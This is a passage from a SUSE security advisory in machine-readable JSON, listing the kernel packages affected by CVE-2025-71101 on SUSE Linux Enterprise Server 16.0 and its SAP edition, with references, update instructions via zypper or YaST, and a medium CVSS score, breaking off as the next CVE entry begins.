"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71101",
"url": "https://www.suse.com/security/cve/CVE-2025-71101"
},
{
"category": "external",
"summary": "SUSE Bug 1256594 for CVE-2025-71101",
"url": "https://bugzilla.suse.com/1256594"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71101"
},
{
"cve": "CVE-2025-71108",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71108"
}
],
"notes": [
{
"category": "general",
